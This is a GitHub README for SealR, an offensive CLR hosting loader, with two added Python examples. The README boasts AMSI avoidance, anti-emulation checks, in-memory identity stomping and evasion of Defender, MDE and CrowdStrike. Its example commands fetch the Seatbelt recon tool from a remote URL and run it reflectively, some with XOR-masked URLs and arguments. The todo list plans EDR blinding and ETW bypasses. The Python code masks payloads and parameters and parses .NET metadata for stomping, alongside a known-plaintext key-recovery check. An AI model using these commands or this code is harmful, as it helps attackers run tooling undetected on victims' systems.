
ohxeighty/SealR


Lazy repo for SealR

Documentation and usage are still to come (grep the source for the parameters). It uses the Load_2 overload of the deprecated CorRuntime host interface to avoid loading AMSI, per https://github.com/passthehashbrowns/Being-A-Good-CLR-Host. It also ships with some basic guard rails and anti-emulation checks, plus a native .NET data directory metadata parser for lazy identity stomping.

Gets past Defender, MDE and CrowdStrike as of writing.

examples

Load an assembly from disk:

    CLRHost.exe -d -a C:\Windows\Temp\benign.exe

Exhaust EDR/AV attention by first loading an embedded benign binary (requires baking an RCDATA resource that points to an assembly into the build). The --exhaust parameters can instead point at an assembly on disk or one reflectively loaded from the web:

    CLRHost.exe -d -a C:\Windows\Temp\benign.exe --exhaust-embedded

List the methods in an assembly:

    CLRHost.exe -d -a C:\Windows\Temp\benign.exe --list-methods

Reflectively load from the web with an argument string and stomp the assembly identity in memory:

    CLRHost.exe -w -a https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.0_x64/Seatbelt.exe --verbose -p "LocalUsers" --stomp-identity

Same as above, but for a payload XOR-encoded with a repeating mask:

    CLRHost.exe --xor --key some_key_here -w -a https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.0_x64/Seatbelt.exe --verbose -p "LocalUsers" --stomp-identity

Same as above, but the -a and -p values are also masked (each value XORed with the repeating --param-key, then base64-encoded):

    CLRHost.exe --param-xor --param-key testmask --xor --key testmask -w -a HBEHBB5bXEQTDAccGANdCBsIXDIBAB0MAgwYWz4JEhkEJhwYAQQQHx0KHVsfAAREBgAVB0IJFgoQFlwZDBIHDgZKPREZJwEKGQAEGx8KLF9aVSwMW1VcOBEEBxYIDQdFER0W --verbose -p OAoQFQE0AA4GFg== --stomp-identity
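The masking in the last example is repeating-key XOR followed by base64: the -a and -p values above decode to the Seatbelt URL and to LocalUsers under the key testmask. The following Python is an added example written for this page, not SealR's own code; it reproduces those exact strings, undoes them, and shows the caveat that matters operationally: a repeating XOR mask is obfuscation, not encryption, and a predictable plaintext prefix (https:// for a URL, MZ for a PE payload) hands the key straight back to whoever captures the command line or the download. Whether the --xor/--key assembly payload is raw XORed bytes or base64-wrapped is not stated on the page; xor_file assumes raw bytes.

```python
"""Added example for this page (not SealR's code): the repeating-key XOR + base64
masking behind the -a/-p values in the last README example, plus the known-plaintext
check that shows why it is obfuscation rather than encryption."""
import base64
from itertools import cycle


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data against key, cycling the key; applying it twice restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def mask_param(value: str, key: str) -> str:
    """Mask a command-line value: UTF-8 bytes XOR key, then standard base64."""
    return base64.b64encode(xor_repeat(value.encode("utf-8"), key.encode("utf-8"))).decode("ascii")


def unmask_param(masked: str, key: str) -> str:
    """Inverse of mask_param."""
    return xor_repeat(base64.b64decode(masked), key.encode("utf-8")).decode("utf-8")


def recover_key(masked: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: XOR the masked bytes with plaintext you can guess
    (an https:// prefix, the MZ header of a PE) and the key falls out, one key byte
    per known byte. This is what a detection engineer does with a captured payload."""
    return bytes(m ^ p for m, p in zip(masked, known_plaintext))


def xor_file(src: str, dst: str, key: str) -> int:
    """Write a raw XOR-masked copy of an assembly for --xor --key. Assumption: the
    payload the host fetches is raw XORed bytes (no base64); the page does not say."""
    with open(src, "rb") as f:
        data = f.read()
    with open(dst, "wb") as f:
        f.write(xor_repeat(data, key.encode("utf-8")))
    return len(data)


if __name__ == "__main__":
    url = ("https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/"
           "NetFramework_4.0_x64/Seatbelt.exe")
    masked_url = mask_param(url, "testmask")
    print(masked_url)                               # matches the -a value in the README
    print(mask_param("LocalUsers", "testmask"))     # matches the -p value: OAoQFQE0AA4GFg==
    print(unmask_param(masked_url, "testmask") == url)
    # Recover the key from nothing but the masked value and the predictable prefix.
    print(recover_key(base64.b64decode(masked_url), b"https://"))   # b'testmask'
```

The recover_key step is the check worth remembering before trusting --param-xor for anything: with an 8-byte key and an 8-byte guessable prefix the whole key is recovered from a single masked argument, so the masking only defeats naive string matching on the command line, not an analyst with the sample.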

todo

  • better parameter parsing so that --invoke-member can call methods that do not take a string array
  • interactive mode so the AppDomain is not torn down and further assemblies can keep being loaded; useful for loading GAC assemblies and manipulating them, à la PowerShell .NET tradecraft
  • optional compile-time includes for EDR blinding (loud ones and softer ones such as WFP abuse), patchless ETW bypasses, etc.
  • verify and fix some probable index-width sizing errors in the metadata stream parsing used for identity stomping
  • if I can be bothered, migrate it to classes so it does not become an unmaintainable monster of a codebase
  • fake-sign the binary?
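For the native .NET metadata parser mentioned at the top and the index-width item in the todo list: the Assembly table row that identity stomping overwrites lives in the #~ stream, and the width of its #Strings and #Blob indexes (2 or 4 bytes) is set by the HeapSizes byte in that stream's header, which is the usual place for sizing errors to creep in. The following Python is an added example, not the project's parser, that walks a managed PE through data directory 14 to the metadata root, reads the stream headers and the #~ header as laid out in ECMA-335 II.24.2, and derives the index widths, row counts and resulting Assembly row size. The sample metadata blob it builds is constructed here for illustration; pass a real managed PE path to run it on a file.

```python
"""Added example for this page (illustrative, not SealR's parser): walk a managed PE
to its CLI metadata root, parse the stream headers and the #~ table header per
ECMA-335 II.24.2, and derive the index widths that decide the Assembly row layout."""
import struct

HEAP_STRINGS_WIDE, HEAP_GUID_WIDE, HEAP_BLOB_WIDE = 0x01, 0x02, 0x04   # #~ HeapSizes bits
TABLE_MODULE, TABLE_ASSEMBLY = 0x00, 0x20


def metadata_from_pe(data: bytes) -> bytes:
    """Carve the metadata root out of a PE via data directory 14 (the CLR header)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    datadir = opt + (96 if magic == 0x10B else 112)          # PE32 vs PE32+
    clr_rva = struct.unpack_from("<I", data, datadir + 14 * 8)[0]
    if clr_rva == 0:
        raise ValueError("no CLR header: not a managed PE")
    sections = [struct.unpack_from("<8sIIII", data, opt + opt_size + i * 40)
                for i in range(nsections)]                    # name, vsize, va, rawsize, rawptr

    def rva_to_offset(rva: int) -> int:
        for _name, vsize, va, rawsize, rawptr in sections:
            if va <= rva < va + max(vsize, rawsize):
                return rva - va + rawptr
        raise ValueError("RVA 0x%x is outside every section" % rva)

    md_rva, md_size = struct.unpack_from("<II", data, rva_to_offset(clr_rva) + 8)
    md_off = rva_to_offset(md_rva)
    return data[md_off:md_off + md_size]


def parse_metadata_root(md: bytes):
    """Return (runtime version string, {stream name: (offset, size)})."""
    sig, _major, _minor, _reserved, vlen = struct.unpack_from("<IHHII", md, 0)
    if sig != 0x424A5342:                                     # "BSJB"
        raise ValueError("missing BSJB signature")
    version = md[16:16 + vlen].split(b"\0", 1)[0].decode("ascii")
    pos = 16 + vlen                                           # vlen is already rounded up to 4
    _flags, nstreams = struct.unpack_from("<HH", md, pos)
    pos += 4
    streams = {}
    for _ in range(nstreams):
        off, size = struct.unpack_from("<II", md, pos)
        pos += 8
        end = md.index(b"\0", pos)
        streams[md[pos:end].decode("ascii")] = (off, size)
        pos = (end + 1 + 3) & ~3                              # NUL-terminated name, padded to 4
    return version, streams


def parse_tables_header(md: bytes, streams: dict):
    """Return (HeapSizes byte, index widths, {table id: row count}) from #~ (or #- if uncompressed)."""
    off, _size = streams["#~"] if "#~" in streams else streams["#-"]
    _r1, _maj, _min, heap_sizes, _r2, valid, _sorted = struct.unpack_from("<IBBBBQQ", md, off)
    pos = off + 24
    rows = {}
    for table in range(64):                   # one uint32 row count per Valid bit, in table order
        if valid >> table & 1:
            rows[table] = struct.unpack_from("<I", md, pos)[0]
            pos += 4
    widths = {"string": 4 if heap_sizes & HEAP_STRINGS_WIDE else 2,
              "guid": 4 if heap_sizes & HEAP_GUID_WIDE else 2,
              "blob": 4 if heap_sizes & HEAP_BLOB_WIDE else 2}
    return heap_sizes, widths, rows


def assembly_row_size(widths: dict) -> int:
    """Assembly row: HashAlgId(4), four uint16 version parts, Flags(4), PublicKey(blob),
    Name(string), Culture(string). Assuming 2-byte indexes here is the classic sizing bug."""
    return 4 + 4 * 2 + 4 + widths["blob"] + 2 * widths["string"]


def build_sample_metadata(heap_sizes: int) -> bytes:
    """Constructed sample, not from a real binary: root with #~ and #Strings streams,
    one Module row and one Assembly row, and the requested HeapSizes flags."""
    tables = struct.pack("<IBBBBQQ", 0, 2, 0, heap_sizes, 1,
                         (1 << TABLE_MODULE) | (1 << TABLE_ASSEMBLY), 0) + struct.pack("<II", 1, 1)
    strings = b"\0a\0\0"
    root = b"BSJB" + struct.pack("<HHII", 1, 1, 0, 12) + b"v4.0.30319\0\0" + struct.pack("<HH", 0, 2)
    first = len(root) + 12 + 20               # two stream headers: "#~" (12 bytes), "#Strings" (20)
    root += struct.pack("<II", first, len(tables)) + b"#~\0\0"
    root += struct.pack("<II", first + len(tables), len(strings)) + b"#Strings\0\0\0\0"
    return root + tables + strings


if __name__ == "__main__":
    import sys
    md = metadata_from_pe(open(sys.argv[1], "rb").read()) if len(sys.argv) > 1 else build_sample_metadata(0x07)
    version, streams = parse_metadata_root(md)
    heap_sizes, widths, rows = parse_tables_header(md, streams)
    print(version, streams, hex(heap_sizes), widths, rows, "assembly row bytes:", assembly_row_size(widths))
```

Locating the Assembly row itself still needs the sizes of every table before 0x20, which depend on the same widths plus the coded-index rules; the point of the example is that the widths must be read from HeapSizes per binary rather than assumed, because a small assembly with 2-byte indexes and a large one with 4-byte #Strings or #Blob indexes put the name and public-key fields at different offsets within the row.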

About

funny CLR hosting
